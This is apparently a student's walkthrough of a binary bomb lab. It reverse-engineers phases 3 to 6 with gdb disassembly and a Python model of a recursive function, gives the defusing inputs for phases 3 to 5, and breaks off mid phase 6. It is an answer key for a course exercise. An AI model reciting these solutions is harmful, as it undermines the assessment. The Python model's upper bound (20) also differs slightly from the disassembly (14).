16a4: b8 63 00 00 00 mov $0x63,%eax
16a9: e9 d9 00 00 00 jmp 1787 <phase_3+0x14f>
16ae: b8 61 00 00 00 mov $0x61,%eax
16b3: 81 7c 24 08 27 01 00 cmpl $0x127,0x8(%rsp)
16ba: 00
16bb: 0f 84 c6 00 00 00 je 1787 <phase_3+0x14f>
16c1: e8 84 06 00 00 call 1d4a <explode_bomb>
16c6: b8 61 00 00 00 mov $0x61,%eax
16cb: e9 b7 00 00 00 jmp 1787 <phase_3+0x14f>
16d0: b8 78 00 00 00 mov $0x78,%eax
16d5: 81 7c 24 08 e7 02 00 cmpl $0x2e7,0x8(%rsp)
16dc: 00
16dd: 0f 84 a4 00 00 00 je 1787 <phase_3+0x14f>
16e3: e8 62 06 00 00 call 1d4a <explode_bomb>
16e8: b8 78 00 00 00 mov $0x78,%eax
16ed: e9 95 00 00 00 jmp 1787 <phase_3+0x14f>
16f2: b8 64 00 00 00 mov $0x64,%eax
16f7: 81 7c 24 08 80 02 00 cmpl $0x280,0x8(%rsp)
16fe: 00
16ff: 0f 84 82 00 00 00 je 1787 <phase_3+0x14f>
1705: e8 40 06 00 00 call 1d4a <explode_bomb>
170a: b8 64 00 00 00 mov $0x64,%eax
170f: eb 76 jmp 1787 <phase_3+0x14f>
1711: b8 6d 00 00 00 mov $0x6d,%eax
1716: 81 7c 24 08 ff 02 00 cmpl $0x2ff,0x8(%rsp)
171d: 00
171e: 74 67 je 1787 <phase_3+0x14f>
1720: e8 25 06 00 00 call 1d4a <explode_bomb>
1725: b8 6d 00 00 00 mov $0x6d,%eax
172a: eb 5b jmp 1787 <phase_3+0x14f>
172c: b8 71 00 00 00 mov $0x71,%eax
1731: 81 7c 24 08 75 03 00 cmpl $0x375,0x8(%rsp)
1738: 00
1739: 74 4c je 1787 <phase_3+0x14f>
173b: e8 0a 06 00 00 call 1d4a <explode_bomb>
1740: b8 71 00 00 00 mov $0x71,%eax
1745: eb 40 jmp 1787 <phase_3+0x14f>
1747: b8 79 00 00 00 mov $0x79,%eax
174c: 81 7c 24 08 94 02 00 cmpl $0x294,0x8(%rsp)
1753: 00
1754: 74 31 je 1787 <phase_3+0x14f>
1756: e8 ef 05 00 00 call 1d4a <explode_bomb>
175b: b8 79 00 00 00 mov $0x79,%eax
1760: eb 25 jmp 1787 <phase_3+0x14f>
1762: b8 79 00 00 00 mov $0x79,%eax
1767: 81 7c 24 08 88 02 00 cmpl $0x288,0x8(%rsp)
176e: 00
176f: 74 16 je 1787 <phase_3+0x14f>
1771: e8 d4 05 00 00 call 1d4a <explode_bomb>
1776: b8 79 00 00 00 mov $0x79,%eax
177b: eb 0a jmp 1787 <phase_3+0x14f>
177d: e8 c8 05 00 00 call 1d4a <explode_bomb>
1782: b8 68 00 00 00 mov $0x68,%eax
1787: 38 44 24 07 cmp %al,0x7(%rsp)
178b: 75 05 jne 1792 <phase_3+0x15a>
178d: 48 83 c4 18 add $0x18,%rsp
1791: c3 ret
1792: e8 b3 05 00 00 call 1d4a <explode_bomb>
1797: eb f4 jmp 178d <phase_3+0x155>
...
165b: e8 80 fc ff ff call 12e0 <__isoc99_sscanf@plt>
...
We can see that scanf
is being called which means we need to figure out what datatype(s) the program is expecting.
Because I do not want to enter the solutions to phases 1 and 2 again and again, I am goig to pass a file which has these solutions.
joxxxn@jupyter-nxxh6xx8:~/lab2-bomblab-navanchauhan/bombbomb$ gdb -ex 'break phase_3' -ex 'break explode_bomb' -ex 'run' -args ./bomb sol.txt
GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./bomb...
Breakpoint 1 at 0x1638
Breakpoint 2 at 0x1d4a
Starting program: /home/joxxxn/lab2-bomblab-navanchauhan/bombbomb/bomb sol.txt
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
Phase 1 defused. How about the next one?
That's number 2. Keep going!
random string
Breakpoint 1, 0x0000555555555638 in phase_3 ()
(gdb) disas
Dump of assembler code for function phase_3:
=> 0x0000555555555638 <+0>: endbr64
0x000055555555563c <+4>: sub $0x18,%rsp
0x0000555555555640 <+8>: lea 0x7(%rsp),%rcx
0x0000555555555645 <+13>: lea 0xc(%rsp),%rdx
0x000055555555564a <+18>: lea 0x8(%rsp),%r8
0x000055555555564f <+23>: lea 0x1b60(%rip),%rsi # 0x5555555571b6
0x0000555555555656 <+30>: mov $0x0,%eax
0x000055555555565b <+35>: call 0x5555555552e0 <__isoc99_sscanf@plt>
0x0000555555555660 <+40>: cmp $0x2,%eax
0x0000555555555663 <+43>: jle 0x555555555685 <phase_3+77>
0x0000555555555665 <+45>: cmpl $0x7,0xc(%rsp)
0x000055555555566a <+50>: ja 0x55555555577d <phase_3+325>
0x0000555555555670 <+56>: mov 0xc(%rsp),%eax
0x0000555555555674 <+60>: lea 0x1b55(%rip),%rdx # 0x5555555571d0
0x000055555555567b <+67>: movslq (%rdx,%rax,4),%rax
0x000055555555567f <+71>: add %rdx,%rax
0x0000555555555682 <+74>: notrack jmp *%rax
0x0000555555555685 <+77>: call 0x555555555d4a <explode_bomb>
0x000055555555568a <+82>: jmp 0x555555555665 <phase_3+45>
0x000055555555568c <+84>: mov $0x63,%eax
0x0000555555555691 <+89>: cmpl $0x23d,0x8(%rsp)
0x0000555555555699 <+97>: je 0x555555555787 <phase_3+335>
0x000055555555569f <+103>: call 0x555555555d4a <explode_bomb>
0x00005555555556a4 <+108>: mov $0x63,%eax
0x00005555555556a9 <+113>: jmp 0x555555555787 <phase_3+335>
--Type <RET> for more, q to quit, c to continue without paging--
gdb
has thankfully marked the address which is being passed to scanf
. We can access the value:
(gdb) x/1s 0x5555555571b6
0x5555555571b6: "%d %c %d"
(gdb)
BINGO! The program expects an integer, character, and another integer. Onwards.
0x0000555555555660 <+40>: cmp $0x2,%eax
0x0000555555555663 <+43>: jle 0x555555555685 <phase_3+77>
...
0x0000555555555685 <+77>: call 0x555555555d4a <explode_bomb>
The program checks whether scanf
returns a value <= 2, if it does then it calls the explode_bomb
function.
Note: scanf
returns the number of fields that were successfully converted and assigned
0x0000555555555665 <+45>: cmpl $0x7,0xc(%rsp)
0x000055555555566a <+50>: ja 0x55555555577d <phase_3+325>
...
0x000055555555577d <+325>: call 0x555555555d4a <explode_bomb>
Similarly, the program checks and ensures the returned value is not > 7.
0x0000555555555670 <+56>: mov 0xc(%rsp),%eax
0x0000555555555674 <+60>: lea 0x1b55(%rip),%rdx # 0x5555555571d0
0x000055555555567b <+67>: movslq (%rdx,%rax,4),%rax
0x000055555555567f <+71>: add %rdx,%rax
0x0000555555555682 <+74>: notrack jmp *%rax
0x0000555555555685 <+77>: call 0x555555555d4a <explode_bomb>
0x0000555555555670 <+56>: mov 0xc(%rsp),%eax
- Moves value located at 0xc
(12 in Decimal) bytes above the stack pointer to %eax
register. 0x0000555555555674 <+60>: lea 0x1b55(%rip),%rdx # 0x5555555571d0
- This instruction calculates an effective address by adding 0x1b55
to the current instruction pointer (%rip
). The result is stored in the %rdx
register. 0x000055555555567b <+67>: movslq (%rdx,%rax,4),%rax
movslq
stands for "move with sign-extension from a 32-bit value to a 64-bit value." (if the 32-bit value is negative, the 64-bit result will have all its upper 32 bits set to 1; otherwise, they'll be set to 0). (%rdx,%rax,4)
- First start with the value in the %rdx register, then add to it the value in the %rax register multiplied by 4.%rax
- Destination Register0x000055555555567f <+71>: add %rdx,%rax
- Adds base address in %rdx
to the offset in %rax
0x0000555555555682 <+74>: notrack jmp *%rax
- Jumps to the address stored in %rax
0x0000555555555685 <+77>: call 0x555555555d4a <explode_bomb>
- If we are unable to jump to the specified instruction, call explode_bomb
Let us try to run the program again with a valid input for the first number and see what the program is computing for the address.
I used the input: 3 c 123
.
To check what is the computed address, we can switch to the asm layout by running layout asm
, and then going through instructions ni
or si
until we reach the line movslq (%rdx,%rax,4),%rax
%rax
should hold the value 3.
(gdb) print $rax
$1 = 3
We can see that this makes us jump to <phase_3+186>
(Continue to step through the code by using ni
)
0x00005555555556f2 <+186>: mov $0x64,%eax
0x00005555555556f7 <+191>: cmpl $0x280,0x8(%rsp)
0x00005555555556ff <+199>: je 0x555555555787 <phase_3+335>
0x0000555555555705 <+205>: call 0x555555555d4a <explode_bomb>
We see that 0x64
(Decimal 100) is being stored in %eax
. Then, the program compares 0x280
(Decimal 640) with memory address 0x8
bytes above the stack pointer (%rsp
). If the values are equal, then it jumps to <phase_3+335>
, otherwise explode_bomb
is called.
0x0000555555555787 <+335>: cmp %al,0x7(%rsp)
0x000055555555578b <+339>: jne 0x555555555792 <phase_3+346>
0x000055555555578d <+341>: add $0x18,%rsp
0x0000555555555791 <+345>: ret
0x0000555555555792 <+346>: call 0x555555555d4a <explode_bomb>
Here, the program is comparing the value of our given character to the value stored in %al
(lower 8 bits of EAX
), and checks if they are not equal.
Knowing that the character is stored at an offset of 7 bytes to %rsp
, we can print and check the value by running:
(gdb) x/1cw $rsp+7
c
(gdb) print $al
$1 = 100
We can simply lookup the ASCII table, and see that 100 in decimal stands for the character d
. Let us try this answer:
...
That's number 2. Keep going!
3 d 640
Breakpoint 1, 0x0000555555555638 in phase_3 ()
(gdb) continue
Continuing.
Halfway there!
joxxxn@jupyter-nxxh6xx8:~/lab2-bomblab-navanchauhan/bombbomb$ gdb -ex 'break phase_4' -ex 'break explode_bomb' -ex 'run' -args ./bomb sol.txt
GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./bomb...
Breakpoint 1 at 0x17d3
Breakpoint 2 at 0x1d4a
Starting program: /home/joxxxn/lab2-bomblab-navanchauhan/bombbomb/bomb sol.txt
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Welcome to my fiendish little bomb. You have 6 phases with
which to blow yourself up. Have a nice day!
Phase 1 defused. How about the next one?
That's number 2. Keep going!
Halfway there!
test string
Breakpoint 1, 0x00005555555557d3 in phase_4 ()
(gdb) disas phase_4
Dump of assembler code for function phase_4:
=> 0x00005555555557d3 <+0>: endbr64
0x00005555555557d7 <+4>: sub $0x18,%rsp
0x00005555555557db <+8>: lea 0x8(%rsp),%rcx
0x00005555555557e0 <+13>: lea 0xc(%rsp),%rdx
0x00005555555557e5 <+18>: lea 0x1bba(%rip),%rsi # 0x5555555573a6
0x00005555555557ec <+25>: mov $0x0,%eax
0x00005555555557f1 <+30>: call 0x5555555552e0 <__isoc99_sscanf@plt>
0x00005555555557f6 <+35>: cmp $0x2,%eax
0x00005555555557f9 <+38>: jne 0x555555555802 <phase_4+47>
0x00005555555557fb <+40>: cmpl $0xe,0xc(%rsp)
0x0000555555555800 <+45>: jbe 0x555555555807 <phase_4+52>
0x0000555555555802 <+47>: call 0x555555555d4a <explode_bomb>
0x0000555555555807 <+52>: mov $0xe,%edx
0x000055555555580c <+57>: mov $0x0,%esi
0x0000555555555811 <+62>: mov 0xc(%rsp),%edi
0x0000555555555815 <+66>: call 0x555555555799 <func4>
0x000055555555581a <+71>: cmp $0x2,%eax
0x000055555555581d <+74>: jne 0x555555555826 <phase_4+83>
0x000055555555581f <+76>: cmpl $0x2,0x8(%rsp)
0x0000555555555824 <+81>: je 0x55555555582b <phase_4+88>
0x0000555555555826 <+83>: call 0x555555555d4a <explode_bomb>
0x000055555555582b <+88>: add $0x18,%rsp
0x000055555555582f <+92>: ret
End of assembler dump.
(gdb)
Again, gdb
has marked the string being passed to scanf
(gdb) x/1s 0x5555555573a6
0x5555555573a6: "%d %d"
Okay, so this time we are supposed to enter 2 numbers.
0x00005555555557f6 <+35>: cmp $0x2,%eax
0x00005555555557f9 <+38>: jne 0x555555555802 <phase_4+47>
Checks if there were 2 values read from calling scanf
, if not -> jump to <phase_4+47>
which calls <explode_bomb>
.
0x00005555555557fb <+40>: cmpl $0xe,0xc(%rsp)
0x0000555555555800 <+45>: jbe 0x555555555807 <phase_4+52>
Compare 0xe
(14 in Decimal) and value stored at $rsp
+ 0xc
bytes (Decimal 12). If this condition is met (<= 14), jump to <phase_4+52>
. If not, then explode bomb.
...
0x0000555555555807 <+52>: mov $0xe,%edx
0x000055555555580c <+57>: mov $0x0,%esi
0x0000555555555811 <+62>: mov 0xc(%rsp),%edi
0x0000555555555815 <+66>: call 0x555555555799 <func4>
0x000055555555581a <+71>: cmp $0x2,%eax
0x000055555555581d <+74>: jne 0x555555555826 <phase_4+83>
0x000055555555581f <+76>: cmpl $0x2,0x8(%rsp)
0x0000555555555824 <+81>: je 0x55555555582b <phase_4+88>
0x0000555555555826 <+83>: call 0x555555555d4a <explode_bomb>
0x0000555555555815 <+66>: call 0x555555555799 <func4>
calls another function called func4
0x2
, if they are not equal then the program jumps to call <explode_bomb>
. This tells us that func4
should return 2.Let us look into func4
(gdb) disas func4
Dump of assembler code for function func4:
0x0000555555555799 <+0>: endbr64
0x000055555555579d <+4>: sub $0x8,%rsp
0x00005555555557a1 <+8>: mov %edx,%ecx
0x00005555555557a3 <+10>: sub %esi,%ecx
0x00005555555557a5 <+12>: shr %ecx
0x00005555555557a7 <+14>: add %esi,%ecx
0x00005555555557a9 <+16>: cmp %edi,%ecx
0x00005555555557ab <+18>: ja 0x5555555557b9 <func4+32>
0x00005555555557ad <+20>: mov $0x0,%eax
0x00005555555557b2 <+25>: jb 0x5555555557c5 <func4+44>
0x00005555555557b4 <+27>: add $0x8,%rsp
0x00005555555557b8 <+31>: ret
0x00005555555557b9 <+32>: lea -0x1(%rcx),%edx
0x00005555555557bc <+35>: call 0x555555555799 <func4>
0x00005555555557c1 <+40>: add %eax,%eax
0x00005555555557c3 <+42>: jmp 0x5555555557b4 <func4+27>
0x00005555555557c5 <+44>: lea 0x1(%rcx),%esi
0x00005555555557c8 <+47>: call 0x555555555799 <func4>
0x00005555555557cd <+52>: lea 0x1(%rax,%rax,1),%eax
0x00005555555557d1 <+56>: jmp 0x5555555557b4 <func4+27>
This looks like a recursive function :( (I hate recursive functions)
Let's annotate the instructions.
endbr64
sub $0x8,%rsp // subtract 8 bytes from the stack pointer
mov %edx,%ecx // Move the value in register %edx to %ecx
sub %esi,%ecx // Subtract the value in %esi from %ecx
shr %ecx // Right shift the value in %ecx by one bit (dividing the value by 2)
add %esi,%ecx // Add the value in %esi to %ecx
cmp %edi,%ecx // Compare
ja 0x5555555557b9 <func4+32> // If %ecx > %edi -> jump to instruction at offset +32
mov $0x0,%eax // Move 0 to %eax
jb 0x5555555557c5 <func4+44> // If %ecx < %edi -> jump to instruction at offset +44.
add $0x8,%rsp // add 8 bytes to the stack pointer
ret // return
lea -0x1(%rcx),%edx // LEA of $rxc - 1 into $edx
call 0x555555555799 <func4> // Call itself
add %eax,%eax // Double the value in %eax
jmp 0x5555555557b4 <func4+27> // jump to the instruction at offset +27
lea 0x1(%rcx),%esi
call 0x555555555799 <func4>
lea 0x1(%rax,%rax,1),%eax // LEA of %rax * 2 + 1 into $eax
jmp 0x5555555557b4 <func4+27>
We can either try to compute the values by hand, or write a simple script in Python to get the answer.
def func4(edi, esi=0, edx=20):
ecx = (edx - esi) // 2 + esi
if ecx > edi:
return 2 * func4(edi, esi, ecx - 1)
elif ecx < edi:
return 2 * func4(edi, ecx + 1, edx) + 1
else:
return 0
for x in range(15): # We can limit to 14
if func4(x) == 2:
print(f"answer is {x}")
break
Running this code, we get: answer is 5
Okay, so we know that the number needed to be passed to func4
is 5. But, what about the second digit?
If we go back to the code for <phase_4>
, we can see that:
0x000055555555581f <+76>: cmpl $0x2,0x8(%rsp)
0x0000555555555824 <+81>: je 0x55555555582b <phase_4+88>
The value at $rsp+8
should be equal to 2. So, let us try passing 5 2
as our input.
...
Phase 1 defused. How about the next one?
That's number 2. Keep going!
Halfway there!
5 2
Breakpoint 1, 0x00005555555557d3 in phase_4 ()
(gdb) continue
Continuing.
So you got that one. Try this one.
So you got that one. Try this one.
test string
Breakpoint 1, 0x0000555555555830 in phase_5 ()
(gdb) disas phase_5
Dump of assembler code for function phase_5:
=> 0x0000555555555830 <+0>: endbr64
0x0000555555555834 <+4>: push %rbx
0x0000555555555835 <+5>: sub $0x10,%rsp
0x0000555555555839 <+9>: mov %rdi,%rbx
0x000055555555583c <+12>: call 0x555555555b10 <string_length>
0x0000555555555841 <+17>: cmp $0x6,%eax
0x0000555555555844 <+20>: jne 0x55555555588b <phase_5+91>
0x0000555555555846 <+22>: mov $0x0,%eax
0x000055555555584b <+27>: lea 0x199e(%rip),%rcx # 0x5555555571f0 <array.0>
0x0000555555555852 <+34>: movzbl (%rbx,%rax,1),%edx
0x0000555555555856 <+38>: and $0xf,%edx
0x0000555555555859 <+41>: movzbl (%rcx,%rdx,1),%edx
0x000055555555585d <+45>: mov %dl,0x9(%rsp,%rax,1)
0x0000555555555861 <+49>: add $0x1,%rax
0x0000555555555865 <+53>: cmp $0x6,%rax
0x0000555555555869 <+57>: jne 0x555555555852 <phase_5+34>
0x000055555555586b <+59>: movb $0x0,0xf(%rsp)
0x0000555555555870 <+64>: lea 0x9(%rsp),%rdi
0x0000555555555875 <+69>: lea 0x1943(%rip),%rsi # 0x5555555571bf
0x000055555555587c <+76>: call 0x555555555b31 <strings_not_equal>
0x0000555555555881 <+81>: test %eax,%eax
0x0000555555555883 <+83>: jne 0x555555555892 <phase_5+98>
0x0000555555555885 <+85>: add $0x10,%rsp
0x0000555555555889 <+89>: pop %rbx
0x000055555555588a <+90>: ret
0x000055555555588b <+91>: call 0x555555555d4a <explode_bomb>
0x0000555555555890 <+96>: jmp 0x555555555846 <phase_5+22>
0x0000555555555892 <+98>: call 0x555555555d4a <explode_bomb>
0x0000555555555897 <+103>: jmp 0x555555555885 <phase_5+85>
End of assembler dump.
(gdb)
...
0x000055555555583c <+12>: call 0x555555555b10 <string_length>
0x0000555555555841 <+17>: cmp $0x6,%eax
0x0000555555555844 <+20>: jne 0x55555555588b <phase_5+91>
...
0x000055555555588b <+91>: call 0x555555555d4a <explode_bomb>
...
First things first, these instructions check to make sure the passed string is of length 6, otherwise explode_bomb
is called.
We can also see a similar pattern compared to Phase 2, where we had a loop:
mov $0x0,%eax
- Initialise %eax
and set it to 0 (our counter/iterator)movzbl (%rbx,%rax,1),%edx
- Access %rbx + 1 * %rax
and store it in %edx
and $0xf,%edx
- Take the least significant 4 bits of the byte.movzbl (%rcx,%rdx,1),%edx
- Use the 4 bits as an index into another array and load the corresponding byte into %edx
mov %dl,0x9(%rsp,%rax,1)
- Store the transformed byte into a buffer on the stackadd $0x1,%rax
- Increment %rax
cmp $0x6,%rax
- If the index is not yet 6, loop againmovb $0x0,0xf(%rsp)
- Null-terminate the transformed stringlea 0x9(%rsp),%rdi
and lea 0x1943(%rip),%rsi
all 0x555555555b31 <strings_not_equal>
check if the two strings loaded up just before this are equal or not.We can check the reference string we need, which gdb
has marked as # 0x5555555571bf
, and the lookup table marked as # 0x5555555571f0 <array.0>
(gdb) x/s 0x5555555571bf
0x5555555571bf: "bruins"
(gdb) x/s 0x5555555571f0
0x5555555571f0 <array.0>: "maduiersnfotvbylSo you think you can stop the bomb with ctrl-c, do you?"
(gdb)
To summarize the transformation process:
array.0
)Here's how the transformation process can be reversed for each character in "bruins":
1. Find the index of b
in the lookup table (in our case, it is 13 since we index starting 0)
2. Calculate binary representation of this index (in our case 13 can be written as 1101 in binary)
3. Find ASCII character whose least significant 4 bits match (in our case, m
has binary representation 01101101
)
Repeat for all 6 characters
Hint: Using an ASCII - Binary Table can save you time.
Thus, we can have the following transformation:
b -> m
r -> f
u -> c
i -> d
n -> h
s -> g
Let us try out this answer:
...
That's number 2. Keep going!
Halfway there!
So you got that one. Try this one.
mfcdhg
Breakpoint 1, 0x0000555555555830 in phase_5 ()
(gdb) continue
Continuing.
Good work! On to the next...
Awesome!
Good work! On to the next...
test string
Breakpoint 1, 0x0000555555555899 in phase_6 ()
(gdb) disas phase_6
Dump of assembler code for function phase_6:
=> 0x0000555555555899 <+0>: endbr64
0x000055555555589d <+4>: push %r15
0x000055555555589f <+6>: push %r14
0x00005555555558a1 <+8>: push %r13
0x00005555555558a3 <+10>: push %r12
0x00005555555558a5 <+12>: push %rbp
0x00005555555558a6 <+13>: push %rbx
0x00005555555558a7 <+14>: sub $0x68,%rsp
0x00005555555558ab <+18>: lea 0x40(%rsp),%rax
0x00005555555558b0 <+23>: mov %rax,%r14
0x00005555555558b3 <+26>: mov %rax,0x8(%rsp)
0x00005555555558b8 <+31>: mov %rax,%rsi
0x00005555555558bb <+34>: call 0x555555555d97 <read_six_numbers>
0x00005555555558c0 <+39>: mov %r14,%r12
0x00005555555558c3 <+42>: mov $0x1,%r15d
0x00005555555558c9 <+48>: mov %r14,%r13
0x00005555555558cc <+51>: jmp 0x555555555997 <phase_6+254>
0x00005555555558d1 <+56>: call 0x555555555d4a <explode_bomb>
0x00005555555558d6 <+61>: jmp 0x5555555559a9 <phase_6+272>
0x00005555555558db <+66>: add $0x1,%rbx
0x00005555555558df <+70>: cmp $0x5,%ebx
0x00005555555558e2 <+73>: jg 0x55555555598f <phase_6+246>
0x00005555555558e8 <+79>: mov 0x0(%r13,%rbx,4),%eax
0x00005555555558ed <+84>: cmp %eax,0x0(%rbp)
0x00005555555558f0 <+87>: jne 0x5555555558db <phase_6+66>
0x00005555555558f2 <+89>: call 0x555555555d4a <explode_bomb>
0x00005555555558f7 <+94>: jmp 0x5555555558db <phase_6+66>
0x00005555555558f9 <+96>: mov 0x8(%rsp),%rdx
0x00005555555558fe <+101>: add $0x18,%rdx
0x0000555555555902 <+105>: mov $0x7,%ecx
0x0000555555555907 <+110>: mov %ecx,%eax
0x0000555555555909 <+112>: sub (%r12),%eax
0x000055555555590d <+116>: mov %eax,(%r12)
0x0000555555555911 <+120>: add $0x4,%r12
0x0000555555555915 <+124>: cmp %r12,%rdx
0x0000555555555918 <+127>: jne 0x555555555907 <phase_6+110>
0x000055555555591a <+129>: mov $0x0,%esi
0x000055555555591f <+134>: mov 0x40(%rsp,%rsi,4),%ecx
0x0000555555555923 <+138>: mov $0x1,%eax
0x0000555555555928 <+143>: lea 0x3d01(%rip),%rdx # 0x555555559630 <node1>
--Type <RET> for more, q to quit, c to continue without paging--
0x000055555555592f <+150>: cmp $0x1,%ecx
0x0000555555555932 <+153>: jle 0x55555555593f <phase_6+166>
0x0000555555555934 <+155>: mov 0x8(%rdx),%rdx
0x0000555555555938 <+159>: add $0x1,%eax
0x000055555555593b <+162>: cmp %ecx,%eax
0x000055555555593d <+164>: jne 0x555555555934 <phase_6+155>
0x000055555555593f <+166>: mov %rdx,0x10(%rsp,%rsi,8)
0x0000555555555944 <+171>: add $0x1,%rsi
0x0000555555555948 <+175>: cmp $0x6,%rsi
0x000055555555594c <+179>: jne 0x55555555591f <phase_6+134>
0x000055555555594e <+181>: mov 0x10(%rsp),%rbx
0x0000555555555953 <+186>: mov 0x18(%rsp),%rax
0x0000555555555958 <+191>: mov %rax,0x8(%rbx)
0x000055555555595c <+195>: mov 0x20(%rsp),%rdx
0x0000555555555961 <+200>: mov %rdx,0x8(%rax)
0x0000555555555965 <+204>: mov 0x28(%rsp),%rax
0x000055555555596a <+209>: mov %rax,0x8(%rdx)
0x000055555555596e <+213>: mov 0x30(%rsp),%rdx
0x0000555555555973 <+218>: mov %rdx,0x8(%rax)
0x0000555555555977 <+222>: mov 0x38(%rsp),%rax
0x000055555555597c <+227>: mov %rax,0x8(%rdx)
0x0000555555555980 <+231>: movq $0x0,0x8(%rax)
0x0000555555555988 <+239>: mov $0x5,%ebp
0x000055555555598d <+244>: jmp 0x5555555559c4 <phase_6+299>
0x000055555555598f <+246>: add $0x1,%r15
0x0000555555555993 <+250>: add $0x4,%r14
0x0000555555555997 <+254>: mov %r14,%rbp
0x000055555555599a <+257>: mov (%r14),%eax
0x000055555555599d <+260>: sub $0x1,%eax
0x00005555555559a0 <+263>: cmp $0x5,%eax
0x00005555555559a3 <+266>: ja 0x5555555558d1 <phase_6+56>
0x00005555555559a9 <+272>: cmp $0x5,%r15d
0x00005555555559ad <+276>: jg 0x5555555558f9 <phase_6+96>
0x00005555555559b3 <+282>: mov %r15,%rbx
0x00005555555559b6 <+285>: jmp 0x5555555558e8 <phase_6+79>
0x00005555555559bb <+290>: mov 0x8(%rbx),%rbx
0x00005555555559bf <+294>: sub $0x1,%ebp
0x00005555555559c2 <+297>: je 0x5555555559d5 <phase_6+316>
0x00005555555559c4 <+299>: mov 0x8(%rbx),%rax
0x00005555555559c8 <+303>: mov (%rax),%eax
0x00005555555559ca <+305>: cmp %eax,(%rbx)
--Type <RET> for more, q to quit, c to continue without paging--
0x00005555555559cc <+307>: jge 0x5555555559bb <phase_6+290>
0x00005555555559ce <+309>: call 0x555555555d4a <explode_bomb>
0x00005555555559d3 <+314>: jmp 0x5555555559bb <phase_6+290>
0x00005555555559d5 <+316>: add $0x68,%rsp
0x00005555555559d9 <+320>: pop %rbx
0x00005555555559da <+321>: pop %rbp
0x00005555555559db <+322>: pop %r12
0x00005555555559dd <+324>: pop %r13
0x00005555555559df <+326>: pop %r14
0x00005555555559e1 <+328>: pop %r15
0x00005555555559e3 <+330>: ret
End of assembler dump.
(gdb)
Again, we see the familiar read_six_digits
function.
Let us analyse this function in chunks:
0x00005555555558bb <+34>: call 0x555555555d97 <read_six_numbers>
0x00005555555558c0 <+39>: mov %r14,%r12
0x00005555555558c3 <+42>: mov $0x1,%r15d
0x00005555555558c9 <+48>: mov %r14,%r13
0x00005555555558cc <+51>: jmp 0x555555555997 <phase_6+254>
mov %r14,%r12
: %r14
should be pointing to the location of the stack where the numbers were read into. This address is copied onto %r12
2.2. mov $0x1,%r15d
: The value 1
is moved into %r15
register (probably acting like a counter)
2.3. mov %r14,%r13
: The value is also copied to %r13
0x0000555555555997 <+254>: mov %r14,%rbp
0x000055555555599a <+257>: mov (%r14),%eax
0x000055555555599d <+260>: sub $0x1,%eax
0x00005555555559a0 <+263>: cmp $0x5,%eax
0x00005555555559a3 <+266>: ja 0x5555555558d1 <phase_6+56>
mov (%r14),%eax
-> load the current number in the sequence
2.2. sub $0x1,%eax
-> decrement number by 1cmp $0x5,%eax
: This compares the adjusted value in %eax
with 5.
3.2. ja 0x5555555558d1 <phase_6+56>
: jump if given value is > 5 or < 0=> All numbers should be between 1 and 6.
0x00005555555559a9 <+272>: cmp $0x5,%r15d
0x00005555555559ad <+276>: jg 0x5555555558f9 <phase_6+96>
This checks if the value stored in %r15
is > 5, if it is then it jumps somewhere else. This validates our assumption that %r15
is acting as a counter.
0x00005555555559b3 <+282>: mov %r15,%rbx
0x00005555555559b6 <+285>: jmp 0x5555555558e8 <phase_6+79>
Let us jump to +79
0x00005555555558e8 <+79>: mov 0x0(%r13,%rbx,4),%eax
0x00005555555558ed <+84>: cmp %eax,0x0(%rbp)
0x00005555555558f0 <+87>: jne 0x5555555558db <phase_6+66>
0x00005555555558f2 <+89>: call 0x555555555d4a <explode_bomb>
0x00005555555558f7 <+94>: jmp 0x5555555558db <phase_6+66>
This section deals with checking if all the numbers in the sequence are unique or not. Thus, we need to ensure out 6 digits are unique
0x00005555555558db <+66>: add $0x1,%rbx // Increments by 1
0x00005555555558df <+70>: cmp $0x5,%ebx
0x00005555555558e2 <+73>: jg 0x55555555598f <phase_6+246> // Jump if > 5 (Loop iterations are complete)
0x00005555555558e8 <+79>: mov 0x0(%r13,%rbx,4),%eax
0x00005555555558ed <+84>: cmp %eax,0x0(%rbp)
0x00005555555558f0 <+87>: jne 0x5555555558db <phase_6+66> // Again, check if the number being seen is unique
Now we know that the numbers are unique, between 1-6 (inclusive).
After stepping through the instructions, we can also see that the numbers are being transformed: * By subtracting it from 7 (mov $0x7,%ecx followed by sub (%r12),%eax) * This effectively maps the numbers as follows: 1 to 6, 2 to 5, 3 to 4, 4 to 3, 5 to 2, and 6 to 1.
Let us try to figure out what 0x0000555555555928 <+143>: lea 0x3d01(%rip),%rdx # 0x555555559630 <node1>
is:
(gdb) x/30wx 0x555555559630
0x555555559630 <node1>: 0x000000d9 0x00000001 0x55559640 0x00005555
0x555555559640 <node2>: 0x000003ab 0x00000002 0x55559650 0x00005555
0x555555559650 <node3>: 0x0000014f 0x00000003 0x55559660 0x00005555
0x555555559660 <node4>: 0x000000a1 0x00000004 0x55559670 0x00005555
0x555555559670 <node5>: 0x000001b3 0x00000005 0x55559120 0x00005555
0x555555559680 <host_table>: 0x555573f5 0x00005555 0x5555740f 0x00005555
0x555555559690 <host_table+16>: 0x55557429 0x00005555 0x00000000 0x00000000
0x5555555596a0 <host_table+32>: 0x00000000 0x00000000
(gdb) x/30wx 0x555555559120
